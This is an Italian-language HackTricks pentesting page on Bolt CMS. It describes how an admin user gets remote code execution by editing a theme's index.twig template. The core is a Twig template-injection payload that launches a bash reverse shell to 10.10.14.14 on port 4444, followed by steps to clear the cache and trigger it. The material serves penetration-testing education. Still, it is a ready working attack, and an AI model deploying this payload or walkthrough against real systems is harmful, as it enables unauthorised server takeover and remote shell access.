HackTricksBolt CMS
Reading time: 2 minutes
tip
Impara e pratica l'Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.
RCE
Dopo aver effettuato il login come admin (vai su /bot per accedere al prompt di login), puoi ottenere RCE in Bolt CMS:
- Seleziona
Configuration->View Configuration->Main Configurationoppure vai al percorso URL/bolt/file-edit/config?file=/bolt/config.yaml - Controlla il valore del tema
.png)
- Seleziona
File management->View & edit templates - Seleziona il tema base trovato nel passo precedente (
base-2021in questo caso) e selezionaindex.twig - Nel mio caso questo si trova nel percorso URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Imposta il tuo payload in questo file tramite template injection (Twig), come:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - E salva le modifiche
.png)
- Pulisci la cache in
Maintenance->Clear the cache - Accedi di nuovo alla pagina come utente normale, e il payload dovrebbe essere eseguito
tip
Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.